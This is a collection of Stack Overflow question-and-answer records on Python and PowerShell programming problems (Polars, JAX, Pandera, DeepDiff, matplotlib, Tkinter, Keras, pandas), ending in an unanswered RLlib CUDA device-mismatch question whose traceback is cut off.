79,574,115 | 2025-4-14 | https://stackoverflow.com/questions/79574115/why-wont-polars-when-and-then-run-in-jupyters-notebook | I'm trying to insert/make a new column with these attributes in lines of then("") but i get columnNotFoundError instead for the lines of .then(). But these does not exists yet, what is wrong with the code? df_2023 = df_2023.with_columns( pl.when(pl.col("Tillatt totalvekt opp til og med 3500").eq("X")) .then("Opp til og med 3500") .when(pl.col("Tillatt totalvekt 3501-7500").eq("X")) .then("3501-7500") .when(pl.col("Tillatt totalvekt over 7500").eq("X")) .then("Over 7500") .otherwise(pl.lit(None).cast(pl.String)) .alias("Tillatt totalvekt") ) df_2023.select("Tillat totalvekt").head() *THE ERROR* *ColumnNotFoundError: Opp til og med 3500* I also tried with: pl.when(pl.col("Tillatt totalvekt opp til og med 3500") == "X") .then("Opp til og med 3500") I could really use some help, read also the Polars documentation for polars.when, but it was for no help to solve this problem. Thanks in advance! | The then construct assumes strings are column names. I guess "Opp til og med 3500" is a literal value in your code and not a column name. Use pl.lit('....') to define a literal value explicitly, that way polars won't consider it as a column name. In your case, .then(pl.lit("Opp til og med 3500")) (same for other then). Some more details: https://github.com/pola-rs/polars/issues/13805 | 2 | 3 |
79,571,227 | 2025-4-13 | https://stackoverflow.com/questions/79571227/difference-in-variable-values-in-jax-non-jit-runtime-and-jit-transformed-runtime | I have a deep learning mode which I am running in the jit transformed manner by: my_function_checked = checkify.checkify(model.apply) model_jitted = jax.jit(my_function_checked) err, pred = model_jitted({"params": params}, batch, training=training, rng=rng) err.throw() The code is compiling fine, but now I want to debug the intermediate values after every few steps, save the arrays, and then compare them with pytorch tensors. For this, I need to repeatedly save the arrays. The easiest way to do this is to use any IDE's inbuilt debugger and evaluate the save expression after every few steps. But jax.jit transformed code doesn't allow external debuggers. But, I can do this after disabling the jit. Should I be expecting any discrepancies between the two runs? Can I assume that the values in jit and non-jit runs will remain same? | In general when comparing the same JAX operation with and without JIT, you should expect equivalence up to typical floating point rounding errors, but you should not expect bitwise equivalence, as the compiler may fuse operations in a way that leads to differing float error accumulation. | 1 | 2 |
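Given that answer, a practical way to compare jit and non-jit outputs (or JAX arrays against PyTorch tensors converted to NumPy) is an allclose check rather than exact equality. Below is a minimal helper sketch; the tolerance values are assumptions rather than anything JAX prescribes.

import numpy as np

def assert_close(a, b, rtol=1e-5, atol=1e-6):
    # compare up to floating-point rounding error, not bitwise
    np.testing.assert_allclose(np.asarray(a), np.asarray(b), rtol=rtol, atol=atol)

# e.g. assert_close(jitted_output, eager_output)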
79,572,227 | 2025-4-14 | https://stackoverflow.com/questions/79572227/how-to-annotate-a-pandas-index-of-datetime-date-values-using-pandera-and-mypy | I'm using Pandera to define a schema for a pandas DataFrame where the index represents calendar dates (without time). I want to type-annotate the index as holding datetime.date values. Here's what I tried: # mypy.ini [mypy] plugins = pandera.mypy # schema.py from datetime import date import pandera as pa from pandera.typing import Index class DateIndexModel(pa.DataFrameModel): date: Index[date] But running mypy gives the following error: error: Type argument "date" of "Index" must be a subtype of "bool | int | str | float | ExtensionDtype | <30 more items>" [type-var] Found 1 error in 1 file (checked 1 source file) I know that datetime64[ns] or pandas.Timestamp work fine, but I specifically want to model just dates without time. Is there a type-safe way to do this with Pandera and mypy? Any workaround that lets me enforce date-only index semantics (with or without datetime.date) while keeping mypy happy? Colab example notebook: https://colab.research.google.com/drive/1AdiztxHlyvEMo6B3CzYnvzlnh6a0GfUQ?usp=sharing | TL;DR use Index[pa.engines.pandas_engine.Date] Pandera as of now does not support datetime.date series data type, but it has a semantic representation of a date type column for each library (pandas, polars, pyarrow etc). Date type for pandas.DataFrames is pa.engines.pandas_engine.Date , for the others you can see the API docs. From the pandera documentation: class pandera.engines.pandas_engine.Date(to_datetime_kwargs=None) Semantic representation of a date data type. # schema.py import pandera as pa from pandera.typing import Index class DateIndexModel(pa.DataFrameModel): date: Index[pa.engines.pandas_engine.Date] | 1 | 1 |
79,574,073 | 2025-4-14 | https://stackoverflow.com/questions/79574073/how-to-find-full-delta-using-python-deepdiff | I wrote the following simple test: deeptest.py from deepdiff import DeepDiff, Delta dict1 = {'catalog': {'uuid': 'e95fb23c-57d2-495f-8ab5-2c6b3152bcee', 'metadata': {'title': 'Catalog', 'last-modified': '2025-04-10T16:00:34.033789-05:00', 'version': '1.0', 'oscal-version': '1.1.2'}, 'controls': [{'id': 'ac-1', 'title': 'Access Control', 'parts': [{'id': 'ac-1_stmt', 'name': 'statement', 'prose': 'Access control text.'}]}]}} dict2 = {} diff = DeepDiff(dict1, dict2) print(diff) delta = Delta(diff) print(f'delta {delta}') On the console I observe: $ python python/deep_test.py {'dictionary_item_removed': ["root['catalog']"]} delta <Delta: {"dictionary_item_removed":{"root['catalog']":{"uuid":""}}}> My question/issue is that the delta should be the entirety if dict1, but not all of it is shown...why? | A DeepDiff returns an object that has already calculated the difference of the 2 items. The format of the object is chosen by the view parameter. By default it uses view=’text’, but there is also tree view, which is more complicated and detailed, and pretty() method. You can read about it in the documentation But the thing you probably means is verbose_level option Higher verbose level shows you more details. For example verbose level 1 shows what dictionary item are added or removed. And verbose level 2 shows the value of the items that are added or removed too. from deepdiff import DeepDiff, Delta dict1 = {'catalog': {'uuid': 'e95fb23c-57d2-495f-8ab5-2c6b3152bcee', 'metadata': {'title': 'Catalog', 'last-modified': '2025-04-10T16:00:34.033789-05:00', 'version': '1.0', 'oscal-version': '1.1.2'}, 'controls': [{'id': 'ac-1', 'title': 'Access Control', 'parts': [{'id': 'ac-1_stmt', 'name': 'statement', 'prose': 'Access control text.'}]}]}} dict2 = {} diff = DeepDiff(dict1, dict2, verbose_level=2) print(diff) delta = Delta(diff) print(f'delta {delta}') Output: {'dictionary_item_removed': {"root['catalog']": {'uuid': 'e95fb23c-57d2-495f-8ab5-2c6b3152bcee', 'metadata': {'title': 'Catalog', 'last-modified': '2025-04-10T16:00:34.033789-05:00', 'version': '1.0', 'oscal-version': '1.1.2'}, 'controls': [{'id': 'ac-1', 'title': 'Access Control', 'parts': [{'id': 'ac-1_stmt', 'name': 'statement', 'prose': 'Access control text.'}]}]}}} delta <Delta: {"dictionary_item_removed":{"root['catalog']":{"uuid":""}}}> | 1 | 2 |
79,573,720 | 2025-4-14 | https://stackoverflow.com/questions/79573720/is-there-a-way-to-automate-activating-the-virtualenv-in-powershell-in-windows | I know that to activate virtualenv it's just .venv/Scripts/activate.ps1 but I was wondering if there's a way of having PowerShell do it automatically? Existing questions just talk about activating it, not how to have PowerShell do it automatically: virtualenv in PowerShell? How to activate virtualenv using PowerShell? I am looking for something like this but in PowerShell: Automating virtualenv activation/deactivation in zsh | Add something like the following to your PowerShell $PROFILE file: $ExecutionContext.SessionState.InvokeCommand.LocationChangedAction = [Delegate]::Combine( $ExecutionContext.SessionState.InvokeCommand.LocationChangedAction, [EventHandler[System.Management.Automation.LocationChangedEventArgs]] { # Look for a virtual-environment activation script relative to the # new working directory and, if found, execute it. if ($script = Get-Item -ErrorAction Ignore -LiteralPath ./.venv/Scripts/activate.ps1) { Write-Verbose -Verbose "Activating virtual environment in $PWD..." & $script } } ) Note: This installs an event handler that executes whenever the current location (directory) is changed in the current session and executes a script located in ./.venv/Scripts/activate.ps1 relative to the new current directory, if present. Note: The script's success output, if any, will not print to the display by default (though errors and output from other streams (other than the success one) would); to ensure that it prints, use & $script | Out-Host No attempt is made to deactivate a previously active virtual environment or to detect if a subdirectory of a directory containing a virtual environment is changed to, though doing these things would be possible with additional effort. Through use of [Delegate]::Combine(), the code preserves any preexisting event handler. If you can assume that there is none, you can omit this call and assign the script block ({ ... }) directly to $ExecutionContext.SessionState.InvokeCommand.LocationChangedAction | 2 | 2 |
79,569,354 | 2025-4-11 | https://stackoverflow.com/questions/79569354/for-multi-index-columns-in-pandas-dataframe-how-can-i-group-index-of-a-particul | I have a pandas dataframe which is basically a pivot table. df.plot(kind = "bar",stacked = True) results in following plot. The labels in x-axis are congested as shown. In Excel I can group the first index value for Scenarios pes, tes and des are clear and distinct as shown: How can I create similar labels in x-axis using matplotlib in Python? Here is a sample dataset with minimal code: dict = {'BatteryStorage': {('des-PDef3', 'Central Africa'): 0.0, ('des-PDef3', 'Eastern Africa'): 2475.9, ('des-PDef3', 'North Africa'): 98.0, ('des-PDef3', 'Southern Africa'): 124.0, ('des-PDef3', 'West Africa'): 1500.24, ('pes-PDef3', 'Central Africa'): 0.0, ('pes-PDef3', 'Eastern Africa'): 58.03, ('pes-PDef3', 'North Africa'): 98.0, ('pes-PDef3', 'Southern Africa'): 124.0, ('pes-PDef3', 'West Africa'): 0.0, ('tes-PDef3', 'Central Africa'): 0.0, ('tes-PDef3', 'Eastern Africa'): 1175.86, ('tes-PDef3', 'North Africa'): 98.0, ('tes-PDef3', 'Southern Africa'): 124.0, ('tes-PDef3', 'West Africa'): 0.0}, 'Biomass PP': {('des-PDef3', 'Central Africa'): 44.24, ('des-PDef3', 'Eastern Africa'): 1362.4, ('des-PDef3', 'North Africa'): 178.29, ('des-PDef3', 'Southern Africa'): 210.01999999999998, ('des-PDef3', 'West Africa'): 277.4, ('pes-PDef3', 'Central Africa'): 44.24, ('pes-PDef3', 'Eastern Africa'): 985.36, ('pes-PDef3', 'North Africa'): 90.93, ('pes-PDef3', 'Southern Africa'): 144.99, ('pes-PDef3', 'West Africa'): 130.33, ('tes-PDef3', 'Central Africa'): 44.24, ('tes-PDef3', 'Eastern Africa'): 1362.4, ('tes-PDef3', 'North Africa'): 178.29, ('tes-PDef3', 'Southern Africa'): 210.01999999999998, ('tes-PDef3', 'West Africa'): 277.4}} df = pd.DataFrame.from_dict(dict) df.plot(kind = "bar",stacked = True) plt.show() | I have been struggling a bit with finding a way to draw lines outside the plot area but found a creative solution in this previous thread: How to draw a line outside of an axis in matplotlib (in figure coordinates). Thanks to the author for the solution once again! 
My proposed solution for the problem is the following (see the explanation of distinct parts in the code): import pandas as pd import matplotlib.pyplot as plt from matplotlib.lines import Line2D dict = {'BatteryStorage': {('des-PDef3', 'Central Africa'): 0.0, ('des-PDef3', 'Eastern Africa'): 2475.9, ('des-PDef3', 'North Africa'): 98.0, ('des-PDef3', 'Southern Africa'): 124.0, ('des-PDef3', 'West Africa'): 1500.24, ('pes-PDef3', 'Central Africa'): 0.0, ('pes-PDef3', 'Eastern Africa'): 58.03, ('pes-PDef3', 'North Africa'): 98.0, ('pes-PDef3', 'Southern Africa'): 124.0, ('pes-PDef3', 'West Africa'): 0.0, ('tes-PDef3', 'Central Africa'): 0.0, ('tes-PDef3', 'Eastern Africa'): 1175.86, ('tes-PDef3', 'North Africa'): 98.0, ('tes-PDef3', 'Southern Africa'): 124.0, ('tes-PDef3', 'West Africa'): 0.0}, 'Biomass PP': {('des-PDef3', 'Central Africa'): 44.24, ('des-PDef3', 'Eastern Africa'): 1362.4, ('des-PDef3', 'North Africa'): 178.29, ('des-PDef3', 'Southern Africa'): 210.01999999999998, ('des-PDef3', 'West Africa'): 277.4, ('pes-PDef3', 'Central Africa'): 44.24, ('pes-PDef3', 'Eastern Africa'): 985.36, ('pes-PDef3', 'North Africa'): 90.93, ('pes-PDef3', 'Southern Africa'): 144.99, ('pes-PDef3', 'West Africa'): 130.33, ('tes-PDef3', 'Central Africa'): 44.24, ('tes-PDef3', 'Eastern Africa'): 1362.4, ('tes-PDef3', 'North Africa'): 178.29, ('tes-PDef3', 'Southern Africa'): 210.01999999999998, ('tes-PDef3', 'West Africa'): 277.4}} df = pd.DataFrame.from_dict(dict) df.plot(kind = "bar",stacked = True) region_labels = [idx[1] for idx in df.index] #deriving the part needed for the x-labels from dict plt.tight_layout() #necessary for an appropriate display plt.legend(loc='center left', fontsize=8, frameon=False, bbox_to_anchor=(1, 0.5)) #placing lagend outside the plot area as in the Excel example ax = plt.gca() ax.set_xticklabels(region_labels, rotation=90) #coloring labels for easier interpretation for i, label in enumerate(ax.get_xticklabels()): #print(i) if i <= 4: label.set_color('red') #set favoured colors here if 9 >= i > 4: label.set_color('green') if i > 9: label.set_color('blue') plt.text(1/6, -0.5, 'des', fontweight='bold', transform=ax.transAxes, ha='center', color='red') #adding labels outside the plot area, representing the 'region group code' plt.text(3/6, -0.5, 'pes', fontweight='bold', transform=ax.transAxes, ha='center', color='green') #keep coloring respective to labels plt.text(5/6, -0.5, 'des', fontweight='bold', transform=ax.transAxes, ha='center', color='blue') plt.text(5/6, -0.6, 'b', color='white', transform=ax.transAxes, ha='center') #phantom text to trick `tight_layout` thus making space for the texts above ax2 = plt.axes([0,0,1,1], facecolor=(1,1,1,0)) #for adding lines (i.e., brackets) outside the plot area, we create new axes #creating the first bracket x_start = 0 + 0.015 x_end = 1/3 - 0.015 y = -0.42 bracket1 = [ Line2D([x_start, x_start], [y, y - 0.02], transform=ax.transAxes, color='black', lw=1.5), Line2D([x_start, x_end], [y - 0.02, y - 0.02], transform=ax.transAxes, color='black', lw=1.5), Line2D([x_end, x_end], [y - 0.02, y], transform=ax.transAxes, color='black', lw=1.5), ] for line in bracket1: ax2.add_line(line) #second bracket x_start = 1/3 + 0.015 x_end = 2/3 - 0.015 bracket2 = [ Line2D([x_start, x_start], [y, y - 0.02], transform=ax.transAxes, color='black', lw=1.5), Line2D([x_start, x_end], [y - 0.02, y - 0.02], transform=ax.transAxes, color='black', lw=1.5), Line2D([x_end, x_end], [y - 0.02, y], transform=ax.transAxes, color='black', lw=1.5), ] for line in 
bracket2: ax2.add_line(line) #third bracket x_start = 2/3 + 0.015 x_end = 1 - 0.015 bracket3 = [ Line2D([x_start, x_start], [y, y - 0.02], transform=ax.transAxes, color='black', lw=1.5), Line2D([x_start, x_end], [y - 0.02, y - 0.02], transform=ax.transAxes, color='black', lw=1.5), Line2D([x_end, x_end], [y - 0.02, y], transform=ax.transAxes, color='black', lw=1.5), ] for line in bracket3: ax2.add_line(line) ax2.axis("off") #turn off axes for the new axes plt.tight_layout() plt.show() Resulting in the following plot: | 1 | 3 |
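A lighter-weight variant of the same idea, shown here only as a sketch on a small synthetic MultiIndex frame (the frame contents, the y-offset of -0.45 and the bottom margin are assumptions, not taken from the post): instead of drawing brackets on a second axes, place one centred scenario label per group with ax.text using the blended x-axis transform (x in data coordinates, y in axes coordinates).

import numpy as np
import pandas as pd
import matplotlib.pyplot as plt

# Small synthetic pivot table standing in for the question's data
idx = pd.MultiIndex.from_product(
    [["des-PDef3", "pes-PDef3", "tes-PDef3"],
     ["Central Africa", "Eastern Africa", "North Africa", "Southern Africa", "West Africa"]],
    names=["Scenario", "Region"],
)
df = pd.DataFrame(
    {"BatteryStorage": np.arange(15) * 100.0, "Biomass PP": np.arange(15) * 50.0},
    index=idx,
)

ax = df.plot(kind="bar", stacked=True)
ax.set_xticklabels(df.index.get_level_values("Region"), rotation=90)

# One centred group label per scenario, placed below the rotated region labels
scenarios = df.index.get_level_values("Scenario")
for name in scenarios.unique():
    pos = np.flatnonzero(scenarios == name)          # bar positions of this group
    ax.text(pos.mean(), -0.45, name, ha="center", fontweight="bold",
            transform=ax.get_xaxis_transform())

plt.subplots_adjust(bottom=0.35)                      # leave room under the axis
plt.show()

The vertical offsets usually need tuning to the figure size, just like the bracket coordinates in the accepted answer.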
79,574,000 | 2025-4-14 | https://stackoverflow.com/questions/79574000/how-to-return-a-variable-from-a-tkinter-button-command-function | I am trying to make a button that increments a variable with Tkinter, but when I 'call' (I know it isn't really calling) a function with command, I cannot use a return value, as there is nowhere to return the variable to. Are there alternative ways to do this? Here is my code: import tkinter as tk variable = 0 root = tk.Tk() def variable_incrementer(): global variable variable += 1 # Not return here click_btn = tk.Button(root, text="Click me", command=variable_incrementer) click_btn.pack() root.mainloop() | You don't need to return from the callback. Instead, you can update the label directly. Also, you used .push(), but Tkinter widgets actually use .grid(), .pack() or .place() to display them. Here is the updated code: import tkinter as tk variable = 0 root = tk.Tk() label = tk.Label(root, text=f"Count: {variable}") label.pack() def variable_incrementer(): global variable variable += 1 label.config(text=f"Count: {variable}") click_btn = tk.Button(root, text="Click me", command=variable_incrementer) click_btn.pack() root.mainloop() | 2 | 5 |
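An alternative sketch (not part of the accepted answer) that avoids both the global counter and the manual label.config call: bind the label to a tk.IntVar through textvariable, so the widget re-renders whenever the variable is set.

import tkinter as tk

root = tk.Tk()

# The IntVar holds the state; any widget bound to it updates automatically
counter = tk.IntVar(master=root, value=0)
tk.Label(root, textvariable=counter).pack()

def increment():
    counter.set(counter.get() + 1)

tk.Button(root, text="Click me", command=increment).pack()
root.mainloop()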
79,573,648 | 2025-4-14 | https://stackoverflow.com/questions/79573648/why-do-model-evaluate-vs-manual-loss-computation-with-model-predict-in-tf-k | I use keras and tensorflow to train a 'simple' Multilayer Perceptron (MLP) for a regression task, where I use the mean-squared error (MSE) as loss-function. I denote my training data as x_train, y_train and my test data as x_test, y_test. I recognized the following: For A and B defined as follows: A = model.evaluate(x_test, y_test) and B = loss(pred_test, y_test), where pred_test = model.predict(x_test) are the out-of-sample predictions obtained from my model, the values for A and B are (slightly) different. My question is where the difference comes from and what I can do, such that the values coincide. Below I give a minimal reproducible example in which I tried to find the answer myself (without success). My first suspicion was that this is caused by the batchwise computation, after some experimentation with the batch-sizes, this does not seem to be the case. There are related questions on this website, but the answer to this question about the same(?) problem seems to be specific to CNNs. The discussion in this post asserts that the difference is caused by the batch-wise evaluation in model.evaluate, but 1.) I really do not see how the choice of the batch-size should affect the result since in the end the average is build anyway and 2.) even if setting the batch-size to the number of samples the results are still different. This is even the case in the answer to the beformentioned post. Last, there is this thread, where the problem seems to caused by the property of the metric that it actually is variant w.r.t. to batch-sizes. However, this is not the case for the MSE! Here is the minimal example where I train a regression function on simulations: import tensorflow as tf import keras import numpy as np import random as random # for sims and seed setting random.seed(10) x = np.random.normal([0, 1, 2], [2,1,4], (200, 3)) y = x[:,0] + 0.01 * np.power(x[:,1], 2) + np.sqrt(np.abs(x[:,2] - 3)) + np.random.normal(0, 1, (200)) y = y[:,np.newaxis] x_train = x[0:100,:] y_train = y[0:100,:] x_test = x[101:200,:] y_test = y[101:200,:] # MSE def MSE(a,b): return tf.reduce_mean(tf.pow(a - b, 2)) # layers Inputs_MLP = tf.keras.Input(batch_shape = (100,3), dtype = tf.float32) Layer1_MLP = tf.keras.layers.Dense(16)(Inputs_MLP) Outputs_MLP = tf.keras.layers.Dense(1)(Layer1_MLP) # keras model model_MLP = tf.keras.Model(Inputs_MLP, Outputs_MLP) model_MLP.compile(loss = MSE) history = model_MLP.fit(x = x_train, y = y_train, epochs=5, batch_size = 25) # evaluation # out-of-sample model_MLP.evaluate(x_test, y_test, 100) # 5.561294078826904 pred_MLP_test = model_MLP.predict(x_test, batch_size = 100) MSE(pred_MLP_test, y_test) # <tf.Tensor: shape=(), dtype=float64, numpy=5.561294010797092> # in-sample model_MLP.evaluate(x_train, y_train, 100) # 5.460160732269287 pred_MLP_train = model_MLP.predict(x_train, batch_size = 100) MSE(pred_MLP_train, y_train) # <tf.Tensor: shape=(), dtype=float64, numpy=5.46016054713104> The out-of-sample evaluation yields 5.561294078826904 once and on the other hand 5.561294010797092. For this example it is only a slight difference, but it still bugs me. Also, for another (longer and more complicated) example the difference is bigger. I would appreciate any help! | Keras operates on float32 datatypes, that's what you see when you use model.evaluate(). 
However, when you compute MSE using your custom function, you're computing it in float64 because your y is float64. You'll see the same values if you cast y into float32, something like this: # out-of-sample eval_loss = model_MLP.evaluate(x_test, y_test, batch_size=100) print(f"model.evaluate (test): {eval_loss}") pred_MLP_test = model_MLP.predict(x_test, batch_size=100) manual_mse_f64 = MSE(pred_MLP_test, y_test) print(f"Manual MSE (preds:f32, y:f64): {manual_mse_f64}") manual_mse_f32 = MSE(pred_MLP_test, tf.cast(y_test, tf.float32)) print(f"Manual MSE (preds:f32, y:f32): {manual_mse_f32}") This gives: 1/1 ━━━━━━━━━━━━━━━━━━━━ 0s 110ms/step - loss: 23.0835 model.evaluate (test): 23.0834903717041 1/1 ━━━━━━━━━━━━━━━━━━━━ 0s 62ms/step Manual MSE (preds:f32, y:f64): 23.08349212393938 Manual MSE (preds:f32, y:f32): 23.0834903717041 | 1 | 3 |
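The same float32-vs-float64 effect can be reproduced without any model at all; this sketch uses synthetic data (not the question's) and simply compares the two dtype combinations with NumPy.

import numpy as np

rng = np.random.default_rng(0)
pred = rng.normal(size=10_000).astype(np.float32)  # like model.predict output (float32)
y = rng.normal(size=10_000)                        # float64 targets, as in the question

mse_mixed = np.mean((pred - y) ** 2)                   # promoted to float64 arithmetic
mse_f32 = np.mean((pred - y.astype(np.float32)) ** 2)  # pure float32, like model.evaluate
print(mse_mixed, mse_f32)  # agree to roughly 7 significant digits, then diverge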
79,573,564 | 2025-4-14 | https://stackoverflow.com/questions/79573564/group-by-column-in-polars-dataframe-inside-with-columns | I have the following dataframe: import polars as pl df = pl.DataFrame({ 'ID': [1, 1, 5, 5, 7, 7, 7], 'YEAR': [2025, 2025, 2023, 2024, 2020, 2021, 2021] }) shape: (7, 2) ┌─────┬──────┐ │ ID ┆ YEAR │ │ --- ┆ --- │ │ i64 ┆ i64 │ ╞═════╪══════╡ │ 1 ┆ 2025 │ │ 1 ┆ 2025 │ │ 5 ┆ 2023 │ │ 5 ┆ 2024 │ │ 7 ┆ 2020 │ │ 7 ┆ 2021 │ │ 7 ┆ 2021 │ └─────┴──────┘ Now I would like to get the number of unique years per ID, i.e. shape: (7, 3) ┌─────┬──────┬──────────────┐ │ ID ┆ YEAR ┆ UNIQUE_YEARS │ │ --- ┆ --- ┆ --- │ │ i64 ┆ i64 ┆ u32 │ ╞═════╪══════╪══════════════╡ │ 1 ┆ 2025 ┆ 1 │ │ 1 ┆ 2025 ┆ 1 │ │ 5 ┆ 2023 ┆ 2 │ │ 5 ┆ 2024 ┆ 2 │ │ 7 ┆ 2020 ┆ 2 │ │ 7 ┆ 2021 ┆ 2 │ │ 7 ┆ 2021 ┆ 2 │ └─────┴──────┴──────────────┘ So I tried df.with_columns(pl.col('YEAR').over('ID').alias('UNIQUE_YEARS')) but this gives the wrong result. So I came up with df.join(df.group_by('ID').agg(pl.col('YEAR').unique().len().alias('UNIQUE_YEARS')), on='ID', how='left') which does give the correct result! But it looks a bit clunky, and I wonder if there is a more natural way using with_columns and over? | You can use Expr.n_unique: out = df.with_columns( pl.col('YEAR').n_unique().over('ID').alias('UNIQUE_YEARS') ) Output: shape: (7, 3) ┌─────┬──────┬──────────────┐ │ ID ┆ YEAR ┆ UNIQUE_YEARS │ │ --- ┆ --- ┆ --- │ │ i64 ┆ i64 ┆ u32 │ ╞═════╪══════╪══════════════╡ │ 1 ┆ 2025 ┆ 1 │ │ 1 ┆ 2025 ┆ 1 │ │ 5 ┆ 2023 ┆ 2 │ │ 5 ┆ 2024 ┆ 2 │ │ 7 ┆ 2020 ┆ 2 │ │ 7 ┆ 2021 ┆ 2 │ │ 7 ┆ 2021 ┆ 2 │ └─────┴──────┴──────────────┘ Similarly, group_by can take .n_unique() instead of your .unique().len(). | 1 | 3 |
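For reference, a sketch of the aggregate-then-join route from the question, shortened with n_unique; it produces the same result as the window expression, just with an explicit intermediate frame.

import polars as pl

df = pl.DataFrame({
    "ID": [1, 1, 5, 5, 7, 7, 7],
    "YEAR": [2025, 2025, 2023, 2024, 2020, 2021, 2021],
})

# Aggregate once per ID, then join the counts back onto the original rows
agg = df.group_by("ID").agg(pl.col("YEAR").n_unique().alias("UNIQUE_YEARS"))
out = df.join(agg, on="ID", how="left")
print(out)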
79,573,037 | 2025-4-14 | https://stackoverflow.com/questions/79573037/how-to-specify-location-where-pandas-to-csv-file-is-stored-in-my-directory | I do not know how to save the CSV which this code creates to a specific folder in my directory. Any help would be appreciated! #Store rows which do not conform to the relationship in a new dataframe subset = df[df['check_total_relationship'] == False] subset.to_csv('false_relationships.csv', index=False, header=True, encoding='utf-8') | Just specify the folder in your directory: subset.to_csv('output_data/false_relationships.csv', index=False, header=True, encoding='utf-8') Or you can specify the absolute path: subset.to_csv('/absolute-path/output_data/false_relationships.csv', index=False, header=True, encoding='utf-8') If you need to join paths, you can use os.path: import os BASE_DIR = os.path.dirname(os.path.abspath(__file__)) filepath = 'files/one.txt' request_path = os.path.join(BASE_DIR, filepath) | 1 | 2 |
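A pathlib-based sketch of the same idea (the folder name output_data and the toy frame are assumptions, not from the post); creating the folder first avoids the common follow-up error when the target directory does not exist yet.

from pathlib import Path
import pandas as pd

df = pd.DataFrame({"check_total_relationship": [True, False], "x": [1, 2]})
subset = df[df["check_total_relationship"] == False]

out_dir = Path("output_data")               # assumed target folder
out_dir.mkdir(parents=True, exist_ok=True)  # create it if it is missing
subset.to_csv(out_dir / "false_relationships.csv", index=False, header=True, encoding="utf-8")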
79,568,762 | 2025-4-11 | https://stackoverflow.com/questions/79568762/i-keep-getting-this-error-cuda-available-runtimeerror-expected-all-tensors-to | I'm training a transformer model using RLlib's PPO algorithm, but I encounter a device mismatch error: RuntimeError: Expected all tensors to be on the same device, but found at least two devices, cuda:0 and cpu! Despite moving all model components to the GPU with to(self.device), the error persists. CUDA is available, and the model is intended to run on the GPU. import torch import torch.nn as nn from ray.rllib.models.torch.torch_modelv2 import TorchModelV2 class SimpleTransformer(TorchModelV2, nn.Module): def __init__(self, obs_space, action_space, num_outputs, model_config, name): TorchModelV2.__init__(self, obs_space, action_space, num_outputs, model_config, name) nn.Module.__init__(self) # Configuration custom_config = model_config["custom_model_config"] self.input_dim = 76 self.seq_len = custom_config["seq_len"] self.embed_size = custom_config["embed_size"] self.nheads = custom_config["nhead"] self.nlayers = custom_config["nlayers"] self.dropout = custom_config["dropout"] self.values_out = None self.device = "cuda" if torch.cuda.is_available() else "cpu" # Input layer self.input_embed = nn.Linear(self.input_dim, self.embed_size).to(self.device) # Positional encoding self.pos_encoding = nn.Embedding(self.seq_len, self.embed_size).to(self.device) # Transformer self.transformer = nn.TransformerEncoder( nn.TransformerEncoderLayer( d_model=self.embed_size, nhead=self.nheads, dropout=self.dropout, activation='gelu', device=self.device), num_layers=self.nlayers ) # Policy and value heads self.policy_head = nn.Sequential( nn.Linear(self.embed_size + 2, 64), # Add dynamic features (wallet balance, unrealized PnL) nn.ReLU(), nn.Linear(64, num_outputs) # Action space size ).to(self.device) self.value_head = nn.Sequential( nn.Linear(self.embed_size + 2, 64), nn.ReLU(), nn.Linear(64, 1) ).to(self.device) def forward(self, input_dict, state, seq_len): # Process input x = input_dict["obs"].view(-1, self.seq_len, self.input_dim).to(self.device) dynamic_features = x[:, -1, 2:4].clone().to(self.device) x = self.input_embed(x) position = torch.arange(0, self.seq_len).unsqueeze(0).expand(x.size(0), -1).to(self.device) x = x + self.pos_encoding(position) transformer_out = self.transformer(x) last_out = transformer_out[:, -1, :] combined = torch.cat((last_out, dynamic_features), dim=1) actions = self.policy_head(combined) self.values_out = self.value_head(combined).squeeze(1) return actions, state Here is the full Error message: Trial status: 1 ERROR Current time: 2025-04-11 20:44:55. 
Total running time: 14s Logical resource usage: 0/12 CPUs, 0/1 GPUs (0.0/1.0 accelerator_type:G) ╭──────────────────────────────────────╮ │ Trial name status │ ├──────────────────────────────────────┤ │ PPO_CryptoEnv_a50d0_00000 ERROR │ ╰──────────────────────────────────────╯ Number of errored trials: 1 ╭────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╮ │ Trial name # failures error file │ ├────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────┤ │ PPO_CryptoEnv_a50d0_00000 1 C:/Users/tmpou/AppData/Local/Temp/ray/session_2025-04-11_20-44-35_479257_23712/artifacts/2025-04-11_20-44-40/PPO_2025-04-11_20-44-40/driver_artifacts/PPO_CryptoEnv_a50d0_00000_0_2025-04-11_20-44-40/error.txt │ ╰────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╯ Traceback (most recent call last): File "C:\Users\tmpou\Developer\MSc AI\Deep Learning and Multi-media data\crypto_rl_bot\train.py", line 14, in <module> tune.run( File "C:\Users\tmpou\miniconda3\envs\crypto_bot\Lib\site-packages\ray\tune\tune.py", line 1042, in run raise TuneError("Trials did not complete", incomplete_trials) ray.tune.error.TuneError: ('Trials did not complete', [PPO_CryptoEnv_a50d0_00000]) (PPO pid=31224) 2025-04-11 20:44:55,030 ERROR actor_manager.py:517 -- Ray error, taking actor 1 out of service. 
The actor died because of an error raised in its creation task, ray::RolloutWorker.__init__() (pid=3964, ip=127.0.0.1, actor_id=b2fed95453b6755f07372fcb01000000, repr=<ray.rllib.evaluation.rollout_worker.RolloutWorker object at 0x000001D47885E850>) (PPO pid=31224) File "python\ray\_raylet.pyx", line 1889, in ray._raylet.execute_task (PPO pid=31224) File "python\ray\_raylet.pyx", line 1830, in ray._raylet.execute_task.function_executor (PPO pid=31224) File "C:\Users\tmpou\miniconda3\envs\crypto_bot\Lib\site-packages\ray\_private\function_manager.py", line 724, in actor_method_executor (PPO pid=31224) return method(__ray_actor, *args, **kwargs) (PPO pid=31224) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ (PPO pid=31224) File "C:\Users\tmpou\miniconda3\envs\crypto_bot\Lib\site-packages\ray\util\tracing\tracing_helper.py", line 467, in _resume_span (PPO pid=31224) return method(self, *_args, **_kwargs) (PPO pid=31224) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ (PPO pid=31224) File "C:\Users\tmpou\miniconda3\envs\crypto_bot\Lib\site-packages\ray\rllib\evaluation\rollout_worker.py", line 535, in __init__ (PPO pid=31224) self._update_policy_map(policy_dict=self.policy_dict) (PPO pid=31224) File "C:\Users\tmpou\miniconda3\envs\crypto_bot\Lib\site-packages\ray\util\tracing\tracing_helper.py", line 467, in _resume_span (PPO 